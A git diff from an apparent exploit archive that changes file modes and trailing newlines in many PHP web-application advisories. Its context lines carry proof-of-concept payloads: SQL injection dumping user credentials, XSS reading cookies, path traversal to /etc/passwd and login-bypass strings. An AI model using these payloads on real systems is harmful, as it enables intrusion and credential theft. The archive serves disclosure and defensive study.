mode 100755 new mode 100644 index 6f9ac6161..97ba1d60f --- a/platforms/php/webapps/35796.txt +++ b/platforms/php/webapps/35796.txt @@ -7,4 +7,4 @@ An attacker can exploit these issues to upload arbitrary files onto the webserve MidiCMS Website Builder 2011 is vulnerable; other versions may also be affected. http://www.example.com/admin/jscripts/tiny_mce/plugins/ezfilemanager/index.php -http://www.example.com/?html=../../../../../../../../../../boot.ini%00 \ No newline at end of file +http://www.example.com/?html=../../../../../../../../../../boot.ini%00 \ No newline at end of file diff --git a/platforms/php/webapps/35797.txt b/platforms/php/webapps/35797.txt old mode 100755 new mode 100644 index 08e41041d..ad91dbe89 --- a/platforms/php/webapps/35797.txt +++ b/platforms/php/webapps/35797.txt @@ -4,4 +4,4 @@ The 'com_shop' component for Joomla! is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_shop&task=viewproduct&editid=[SQLi] \ No newline at end of file +http://www.example.com/index.php?option=com_shop&task=viewproduct&editid=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35798.txt b/platforms/php/webapps/35798.txt old mode 100755 new mode 100644 index 955788256..08e412db7 --- a/platforms/php/webapps/35798.txt +++ b/platforms/php/webapps/35798.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Kryn.cms 0.9 is vulnerable; other versions may also be affected. -http://www.example.com/kyrn/index.php?_kurl=%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file +http://www.example.com/kyrn/index.php?_kurl=%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35803.txt b/platforms/php/webapps/35803.txt old mode 100755 new mode 100644 index 3d4a8a3bf..556129536 --- a/platforms/php/webapps/35803.txt +++ b/platforms/php/webapps/35803.txt @@ -7,4 +7,4 @@ A successful exploit may allow an attacker to compromise the application, access Cotonti 0.9.2 is vulnerable; other versions may also be affected. http://www.example.com/users.php?s=-2+AND+31337=0 -http://www.example.com/forums.php?m=topics&s=offtopic&ord=-2+AND+31337=0 \ No newline at end of file +http://www.example.com/forums.php?m=topics&s=offtopic&ord=-2+AND+31337=0 \ No newline at end of file diff --git a/platforms/php/webapps/35808.txt b/platforms/php/webapps/35808.txt old mode 100755 new mode 100644 index afe000523..0771643fb --- a/platforms/php/webapps/35808.txt +++ b/platforms/php/webapps/35808.txt @@ -12,4 +12,4 @@ http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=ale http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)> -http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))> \ No newline at end of file +http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))> \ No newline at end of file diff --git a/platforms/php/webapps/35814.txt b/platforms/php/webapps/35814.txt old mode 100755 new mode 100644 index 95b54a34c..eab20f074 --- a/platforms/php/webapps/35814.txt +++ b/platforms/php/webapps/35814.txt @@ -8,4 +8,4 @@ TEDE Simplificado v1.01 and vS2.04 are vulnerable; other versions may also be af http://www.example.com/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1 -http://www.example.com/tde_busca/tde_fut.php?id=10%20union%20select%201,2,3,4 \ No newline at end of file +http://www.example.com/tde_busca/tde_fut.php?id=10%20union%20select%201,2,3,4 \ No newline at end of file diff --git a/platforms/php/webapps/35816.txt b/platforms/php/webapps/35816.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35819.txt b/platforms/php/webapps/35819.txt old mode 100755 new mode 100644 index ac21c8fdb..6b2735108 --- a/platforms/php/webapps/35819.txt +++ b/platforms/php/webapps/35819.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Ushahidi 2.0.1 is vulnerable; prior versions may also be affected. -http://www.example.com/index.php/admin/dashboard/?range=1[SQLi] \ No newline at end of file +http://www.example.com/index.php/admin/dashboard/?range=1[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35823.txt b/platforms/php/webapps/35823.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35824.txt b/platforms/php/webapps/35824.txt old mode 100755 new mode 100644 index 98de39f2c..ac657604b --- a/platforms/php/webapps/35824.txt +++ b/platforms/php/webapps/35824.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow vBulletin vBExperience 3.0 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/xperience.php?sortfield=xr&sortorder="><script>alert(1);</script> \ No newline at end of file +http://www.example.com/[path]/xperience.php?sortfield=xr&sortorder="><script>alert(1);</script> \ No newline at end of file diff --git a/platforms/php/webapps/35826.txt b/platforms/php/webapps/35826.txt old mode 100755 new mode 100644 index d2d0ef25d..bac8c5af0 --- a/platforms/php/webapps/35826.txt +++ b/platforms/php/webapps/35826.txt @@ -4,4 +4,4 @@ http://www.noticeboardpro.com/notice-board-pro-copyright.htmlJoomla CCBoard is p Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_ccboard&view=postlist&forum=1&topic=2 \ No newline at end of file +http://www.example.com/index.php?option=com_ccboard&view=postlist&forum=1&topic=2 \ No newline at end of file diff --git a/platforms/php/webapps/35829.txt b/platforms/php/webapps/35829.txt old mode 100755 new mode 100644 index 196e5f5c8..b9ca69685 --- a/platforms/php/webapps/35829.txt +++ b/platforms/php/webapps/35829.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Nakid CMS 1.0.2 is vulnerable; other versions may also be affected. -http://www.example.com/cms/assets/addons/kcfinder/browse.php?CKEditorFuncNum=0);alert(0);// \ No newline at end of file +http://www.example.com/cms/assets/addons/kcfinder/browse.php?CKEditorFuncNum=0);alert(0);// \ No newline at end of file diff --git a/platforms/php/webapps/3583.txt b/platforms/php/webapps/3583.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35830.txt b/platforms/php/webapps/35830.txt old mode 100755 new mode 100644 index 179800496..ca773a278 --- a/platforms/php/webapps/35830.txt +++ b/platforms/php/webapps/35830.txt @@ -4,4 +4,4 @@ Multiple WordPress WooThemes (Live Wire) are prone to a cross-site scripting vul An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/wp-content/themes/_theme's_name_/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/wp-content/themes/_theme's_name_/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35831.txt b/platforms/php/webapps/35831.txt old mode 100755 new mode 100644 index 9a388d041..a883a6f3b --- a/platforms/php/webapps/35831.txt +++ b/platforms/php/webapps/35831.txt @@ -5,4 +5,4 @@ PopScript is prone to a remote file-include vulnerability, an SQL-injection vuln Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control. http://www.example.com/PopScript/index.php?act=inbox&mode=1 [ SQL injection ] -http://www.example.com/index.php?mode=[Shell txt]?&password=nassrawi&remember=ON \ No newline at end of file +http://www.example.com/index.php?mode=[Shell txt]?&password=nassrawi&remember=ON \ No newline at end of file diff --git a/platforms/php/webapps/35832.txt b/platforms/php/webapps/35832.txt old mode 100755 new mode 100644 index 0d8ae4d9b..2f572e903 --- a/platforms/php/webapps/35832.txt +++ b/platforms/php/webapps/35832.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Squiz Matrix 4.0.6 and 4.2.2 are vulnerable; other versions may also be affected. -http://www.example.com/__lib/html_form/colour_picker.php?colour=';%20alert(document.cookie);%20var%20x='&pickerid=000000 \ No newline at end of file +http://www.example.com/__lib/html_form/colour_picker.php?colour=';%20alert(document.cookie);%20var%20x='&pickerid=000000 \ No newline at end of file diff --git a/platforms/php/webapps/35833.txt b/platforms/php/webapps/35833.txt old mode 100755 new mode 100644 index 8693d7f19..3449b2a78 --- a/platforms/php/webapps/35833.txt +++ b/platforms/php/webapps/35833.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor NOTE (July 4, 2011): The vendor indicates that this issue affects versions prior to Xataface 1.2.6, while the reporter indicates 1.3rc1 and 1.3rc2 are affected. -http://www.example.com/index.php?-action=../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?-action=../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/35834.txt b/platforms/php/webapps/35834.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35835.txt b/platforms/php/webapps/35835.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35837.html b/platforms/php/webapps/35837.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35838.txt b/platforms/php/webapps/35838.txt old mode 100755 new mode 100644 index 331aecf6a..96825d69e --- a/platforms/php/webapps/35838.txt +++ b/platforms/php/webapps/35838.txt @@ -4,4 +4,4 @@ Tolinet Agencia is prone to an SQL-injection vulnerability because the applicati A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/index.php?tip=art&id=2' <- blind sql \ No newline at end of file +http://www.example.com/index.php?tip=art&id=2' <- blind sql \ No newline at end of file diff --git a/platforms/php/webapps/35839.txt b/platforms/php/webapps/35839.txt old mode 100755 new mode 100644 index d74a5d2d4..ca1810d58 --- a/platforms/php/webapps/35839.txt +++ b/platforms/php/webapps/35839.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Joomla Minitek FAQ Book 1.3 is vulnerable; other versions may also be affected. -http://www.example.com/demo16/faq-book?view=category&id=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users-- \ No newline at end of file +http://www.example.com/demo16/faq-book?view=category&id=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/35840.txt b/platforms/php/webapps/35840.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35846.txt b/platforms/php/webapps/35846.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35851.txt b/platforms/php/webapps/35851.txt old mode 100755 new mode 100644 index 6c441e47a..7abe9ef89 --- a/platforms/php/webapps/35851.txt +++ b/platforms/php/webapps/35851.txt @@ -9,4 +9,4 @@ WebFileExplorer 3.6 is vulnerable; other versions may also be affected. Supplying the following input to the username or password field is sufficient to exploit these issues: user: admin' or '1=1 -pass: anything \ No newline at end of file +pass: anything \ No newline at end of file diff --git a/platforms/php/webapps/35853.php b/platforms/php/webapps/35853.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35857.txt b/platforms/php/webapps/35857.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35858.txt b/platforms/php/webapps/35858.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35860.txt b/platforms/php/webapps/35860.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35861.txt b/platforms/php/webapps/35861.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35862.txt b/platforms/php/webapps/35862.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35863.php b/platforms/php/webapps/35863.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35865.txt b/platforms/php/webapps/35865.txt old mode 100755 new mode 100644 index 00df26932..59f531c16 --- a/platforms/php/webapps/35865.txt +++ b/platforms/php/webapps/35865.txt @@ -7,4 +7,4 @@ A successful exploit may allow an attacker to compromise the application, access Nibbleblog 3.0 is affected; other versions may also be vulnerable. http://www.example.com/index.php?page=[SQLi] -http://www.example.com/post.php?idpost=[SQLi] \ No newline at end of file +http://www.example.com/post.php?idpost=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35866.txt b/platforms/php/webapps/35866.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35867.txt b/platforms/php/webapps/35867.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35871.txt b/platforms/php/webapps/35871.txt old mode 100755 new mode 100644 index 22a64080d..445bdc6af --- a/platforms/php/webapps/35871.txt +++ b/platforms/php/webapps/35871.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Sitemagic CMS 2010.04.17 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?SMExt=[xss] \ No newline at end of file +http://www.example.com/index.php?SMExt=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35874.txt b/platforms/php/webapps/35874.txt old mode 100755 new mode 100644 index dcff46e0f..b18d25b20 --- a/platforms/php/webapps/35874.txt +++ b/platforms/php/webapps/35874.txt @@ -8,4 +8,4 @@ http://www.example.com/path/catalogue.php?id_shop=7[SQLI] http://www.example.com/path/article.php?id_article=7[SQLI] http://www.example.com/path/banniere.php?id_article=7[SQLI] http://www.example.com/path/detail_news.php?id_article=7[SQLI] -http://www.example.com/path/detail_produit.php?id_shop=3&ref=200308G[SQLI] \ No newline at end of file +http://www.example.com/path/detail_produit.php?id_shop=3&ref=200308G[SQLI] \ No newline at end of file diff --git a/platforms/php/webapps/35875.txt b/platforms/php/webapps/35875.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35877.txt b/platforms/php/webapps/35877.txt old mode 100755 new mode 100644 index 73cdd88de..003280f01 --- a/platforms/php/webapps/35877.txt +++ b/platforms/php/webapps/35877.txt @@ -4,4 +4,4 @@ Sitemagic CMS is prone to a directory-traversal vulnerability because it fails t An attacker can exploit this vulnerability to obtain arbitrary local files in the context of the webserver process. -http://www.example.com/smcmsdemoint/index.php?SMTpl=../../../../../../../../../../etc/passwd%00.png \ No newline at end of file +http://www.example.com/smcmsdemoint/index.php?SMTpl=../../../../../../../../../../etc/passwd%00.png \ No newline at end of file diff --git a/platforms/php/webapps/35878.txt b/platforms/php/webapps/35878.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35879.txt b/platforms/php/webapps/35879.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35882.txt b/platforms/php/webapps/35882.txt old mode 100755 new mode 100644 index 964f5d8b3..12c81ee08 --- a/platforms/php/webapps/35882.txt +++ b/platforms/php/webapps/35882.txt @@ -4,4 +4,4 @@ Nodesforum is prone to an SQL-injection vulnerability because the application fa A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/?_nodesforum_node=u1' \ No newline at end of file +http://www.example.com/?_nodesforum_node=u1' \ No newline at end of file diff --git a/platforms/php/webapps/35883.txt b/platforms/php/webapps/35883.txt old mode 100755 new mode 100644 index ff73d6f2f..8c192df9c --- a/platforms/php/webapps/35883.txt +++ b/platforms/php/webapps/35883.txt @@ -4,4 +4,4 @@ The 'com_morfeoshow' component for Joomla! is prone to an SQL-injection vulnerab Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=1015+and+1=0+union+select+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+ \ No newline at end of file +http://www.example.com/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=1015+and+1=0+union+select+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+ \ No newline at end of file diff --git a/platforms/php/webapps/35884.txt b/platforms/php/webapps/35884.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35893.txt b/platforms/php/webapps/35893.txt old mode 100755 new mode 100644 index 781a04c5c..6655d71a0 --- a/platforms/php/webapps/35893.txt +++ b/platforms/php/webapps/35893.txt @@ -11,4 +11,4 @@ select @@version http://www.example.com.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&l=-1union select @@version http://www.example.com/wp-admin/admin.php?page=pretty-link/prli-links.php&group=-1union -select @@version \ No newline at end of file +select @@version \ No newline at end of file diff --git a/platforms/php/webapps/35894.txt b/platforms/php/webapps/35894.txt old mode 100755 new mode 100644 index 8ac350ae6..9f1131ddb --- a/platforms/php/webapps/35894.txt +++ b/platforms/php/webapps/35894.txt @@ -9,4 +9,4 @@ Joomla! CMS versions 1.6.3 and prior are vulnerable. http://www.example.com/joomla163_noseo/index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";><script>alert(/XSS/)</script> http://www.example.com/joomla163_noseo/index.php?option=com_content&view=category&id=19&Itemid=260&limit=10&filter_order_Dir=&limitstart=&filter_order=><script>alert(/XSS/)</script> http://www.example.com/joomla163_noseo/index.php?option=com_newsfeeds&view=category&id=17&whateverehere=";><script>alert(/XSS/)</script>&Itemid=253&limit=10&filter_order_Dir=ASC&filter_order=ordering -http://www.example.com/joomla163_noseo/index.php?option=";><script>alert(/XSS/)</script>&task=reset.request \ No newline at end of file +http://www.example.com/joomla163_noseo/index.php?option=";><script>alert(/XSS/)</script>&task=reset.request \ No newline at end of file diff --git a/platforms/php/webapps/35896.txt b/platforms/php/webapps/35896.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35899.txt b/platforms/php/webapps/35899.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3590.htm b/platforms/php/webapps/3590.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35906.txt b/platforms/php/webapps/35906.txt old mode 100755 new mode 100644 index 752ea12a1..a5b2e1a31 --- a/platforms/php/webapps/35906.txt +++ b/platforms/php/webapps/35906.txt @@ -265,4 +265,4 @@ div.phpwebquest a { font-size : 7.5pt;}; </body> </html> -#greetz to all my friends ,balawi,ro3ob hr ,mothana-X , sharingan jo , and anonymous jo , and all muslim hackers \ No newline at end of file +#greetz to all my friends ,balawi,ro3ob hr ,mothana-X , sharingan jo , and anonymous jo , and all muslim hackers \ No newline at end of file diff --git a/platforms/php/webapps/3591.txt b/platforms/php/webapps/3591.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35914.txt b/platforms/php/webapps/35914.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35916.txt b/platforms/php/webapps/35916.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3592.htm b/platforms/php/webapps/3592.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35922.txt b/platforms/php/webapps/35922.txt old mode 100755 new mode 100644 index 9a1eab8a5..bcb9eff56 --- a/platforms/php/webapps/35922.txt +++ b/platforms/php/webapps/35922.txt @@ -4,4 +4,4 @@ The 'com_jr_tfb' component for Joomla! is prone to a local file-include vulnerab An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/index.php?option=com_jr_tfb&controller=../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?option=com_jr_tfb&controller=../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/35927.txt b/platforms/php/webapps/35927.txt old mode 100755 new mode 100644 index 07f6f63fc..6f467c8eb --- a/platforms/php/webapps/35927.txt +++ b/platforms/php/webapps/35927.txt @@ -4,4 +4,4 @@ Classified Script is prone to a cross-site scripting vulnerability because it fa An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/c-BrowseClassified/q:%5C%22%3E%3Cmarquee%3E%3Ch1%3EXSSed%20By%20r007k17%3C/h1%3E%3C/marquee%3E|p:0|gal:0|typ:|/ \ No newline at end of file +http://www.example.com/c-BrowseClassified/q:%5C%22%3E%3Cmarquee%3E%3Ch1%3EXSSed%20By%20r007k17%3C/h1%3E%3C/marquee%3E|p:0|gal:0|typ:|/ \ No newline at end of file diff --git a/platforms/php/webapps/35929.txt b/platforms/php/webapps/35929.txt old mode 100755 new mode 100644 index f03f870aa..c7fc3801b --- a/platforms/php/webapps/35929.txt +++ b/platforms/php/webapps/35929.txt @@ -4,4 +4,4 @@ The 'com_voj' component for Joomla! is prone to an SQL-injection vulnerability b Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/ [PATH]/index.php?option=com_voj&task=viewCode&id=215 and 1=1 \ No newline at end of file +http://www.example.com/ [PATH]/index.php?option=com_voj&task=viewCode&id=215 and 1=1 \ No newline at end of file diff --git a/platforms/php/webapps/35930.txt b/platforms/php/webapps/35930.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35931.txt b/platforms/php/webapps/35931.txt old mode 100755 new mode 100644 index a9c13f78c..455b78a71 --- a/platforms/php/webapps/35931.txt +++ b/platforms/php/webapps/35931.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc ICMusic 1.2 is vulnerable; other versions may also be affected. -http://www.example.com/demos/icmusic/music.php?music_id=-291+union+all+select+1,@@version,3,4,5,6-- \ No newline at end of file +http://www.example.com/demos/icmusic/music.php?music_id=-291+union+all+select+1,@@version,3,4,5,6-- \ No newline at end of file diff --git a/platforms/php/webapps/35940.txt b/platforms/php/webapps/35940.txt old mode 100755 new mode 100644 index edfe16380..69620faa4 --- a/platforms/php/webapps/35940.txt +++ b/platforms/php/webapps/35940.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a The following example input is available: Username: ' or 0=0 # -Password: ' or 0=0 # \ No newline at end of file +Password: ' or 0=0 # \ No newline at end of file diff --git a/platforms/php/webapps/35942.txt b/platforms/php/webapps/35942.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35943.txt b/platforms/php/webapps/35943.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35944.txt b/platforms/php/webapps/35944.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35945.txt b/platforms/php/webapps/35945.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35946.txt b/platforms/php/webapps/35946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35947.txt b/platforms/php/webapps/35947.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35950.txt b/platforms/php/webapps/35950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35954.txt b/platforms/php/webapps/35954.txt old mode 100755 new mode 100644 index 60a7e621c..6d978b163 --- a/platforms/php/webapps/35954.txt +++ b/platforms/php/webapps/35954.txt @@ -4,4 +4,4 @@ Auto Web Toolbox is prone to an SQL-injection vulnerability because the applicat A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/inventory/details.php?id=496 \ No newline at end of file +http://www.example.com/inventory/details.php?id=496 \ No newline at end of file diff --git a/platforms/php/webapps/35955.txt b/platforms/php/webapps/35955.txt old mode 100755 new mode 100644 index 87aa0fffe..7f0a2c852 --- a/platforms/php/webapps/35955.txt +++ b/platforms/php/webapps/35955.txt @@ -4,4 +4,4 @@ Easy Estate Rental is prone to an SQL-injection vulnerability because the applic A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/demo/uk/site_location.php?s_location=46â??a \ No newline at end of file +http://www.example.com/demo/uk/site_location.php?s_location=46â??a \ No newline at end of file diff --git a/platforms/php/webapps/35956.txt b/platforms/php/webapps/35956.txt old mode 100755 new mode 100644 index a6382c8e3..a5a331dab --- a/platforms/php/webapps/35956.txt +++ b/platforms/php/webapps/35956.txt @@ -4,4 +4,4 @@ The 'Foto' component for Joomla! is prone to an SQL-injection vulnerability beca A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_foto&task=categoria&id_categoria=-4+union+select+1,password,username,4,5,6,7+from+jos_users-- \ No newline at end of file +http://www.example.com/index.php?option=com_foto&task=categoria&id_categoria=-4+union+select+1,password,username,4,5,6,7+from+jos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/35958.txt b/platforms/php/webapps/35958.txt old mode 100755 new mode 100644 index 5f80d7c67..9a4f2f80b --- a/platforms/php/webapps/35958.txt +++ b/platforms/php/webapps/35958.txt @@ -4,4 +4,4 @@ The Juicy Gallery component for Joomla! is prone to an SQL-injection vulnerabili A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_juicy&task=showComments&picId=[EXPLOIT] \ No newline at end of file +http://www.example.com/index.php?option=com_juicy&task=showComments&picId=[EXPLOIT] \ No newline at end of file diff --git a/platforms/php/webapps/35959.txt b/platforms/php/webapps/35959.txt old mode 100755 new mode 100644 index 35d06f39c..94043cfde --- a/platforms/php/webapps/35959.txt +++ b/platforms/php/webapps/35959.txt @@ -4,4 +4,4 @@ The 'com_hospital' component for Joomla! is prone to an SQL-injection vulnerabil Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_hospital&view=departments&Itemid=21&did=[SQL INJECTION] \ No newline at end of file +http://www.example.com/index.php?option=com_hospital&view=departments&Itemid=21&did=[SQL INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/3596.txt b/platforms/php/webapps/3596.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35960.txt b/platforms/php/webapps/35960.txt old mode 100755 new mode 100644 index a491923e8..6e2230f51 --- a/platforms/php/webapps/35960.txt +++ b/platforms/php/webapps/35960.txt @@ -4,4 +4,4 @@ The Controller component for Joomla! is prone to an SQL-injection vulnerability A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_controller&id=53&Itemid=[SQLi] \ No newline at end of file +http://www.example.com/index.php?option=com_controller&id=53&Itemid=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35966.txt b/platforms/php/webapps/35966.txt old mode 100755 new mode 100644 index 40a00286a..64c510776 --- a/platforms/php/webapps/35966.txt +++ b/platforms/php/webapps/35966.txt @@ -4,4 +4,4 @@ The 'com_newssearch' component for Joomla! is prone to an SQL-injection vulnerab Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_newssearch&type=detail&section=2&id=15' \ No newline at end of file +http://www.example.com/index.php?option=com_newssearch&type=detail&section=2&id=15' \ No newline at end of file diff --git a/platforms/php/webapps/35967.txt b/platforms/php/webapps/35967.txt old mode 100755 new mode 100644 index 97ca30e67..7ae407903 --- a/platforms/php/webapps/35967.txt +++ b/platforms/php/webapps/35967.txt @@ -4,4 +4,4 @@ AJ Classifieds is prone to an SQL-injection vulnerability because it fails to su Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/demo/ajclassifieds/classifiedsauto/index.php?do=detaillisting&listingid=77â??a \ No newline at end of file +http://www.example.com/demo/ajclassifieds/classifiedsauto/index.php?do=detaillisting&listingid=77â??a \ No newline at end of file diff --git a/platforms/php/webapps/35968.txt b/platforms/php/webapps/35968.txt old mode 100755 new mode 100644 index e3d07d905..7653ca733 --- a/platforms/php/webapps/35968.txt +++ b/platforms/php/webapps/35968.txt @@ -9,4 +9,4 @@ http://www.example.com/demo5/search.php?realtor=2â??a http://www.example.com/demo4/item.php?id=94edd43315507ad8509d7bfb2d2bc936â??a -http://www.example.com/demo3/search.php?c=47â??a \ No newline at end of file +http://www.example.com/demo3/search.php?c=47â??a \ No newline at end of file diff --git a/platforms/php/webapps/35969.txt b/platforms/php/webapps/35969.txt old mode 100755 new mode 100644 index e12f4f191..d7b5c7835 --- a/platforms/php/webapps/35969.txt +++ b/platforms/php/webapps/35969.txt @@ -4,4 +4,4 @@ BlueSoft Social Networking CMS is prone to an SQL-injection vulnerability becaus Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/demo/user_profile.php?view=photo&photo_id=82â??a \ No newline at end of file +http://www.example.com/demo/user_profile.php?view=photo&photo_id=82â??a \ No newline at end of file diff --git a/platforms/php/webapps/35971.txt b/platforms/php/webapps/35971.txt old mode 100755 new mode 100644 index bdde9b42a..d02fc7100 --- a/platforms/php/webapps/35971.txt +++ b/platforms/php/webapps/35971.txt @@ -11,4 +11,4 @@ The following example URIs are available: http://www.example.com/wordpress/?s=<h2>XSSED</h2> -http://www.example.com/wordpress/?p=1&<h1>XSSED</h1> \ No newline at end of file +http://www.example.com/wordpress/?p=1&<h1>XSSED</h1> \ No newline at end of file diff --git a/platforms/php/webapps/35972.txt b/platforms/php/webapps/35972.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35973.txt b/platforms/php/webapps/35973.txt old mode 100755 new mode 100644 index f8fad7de1..2137bbe03 --- a/platforms/php/webapps/35973.txt +++ b/platforms/php/webapps/35973.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br 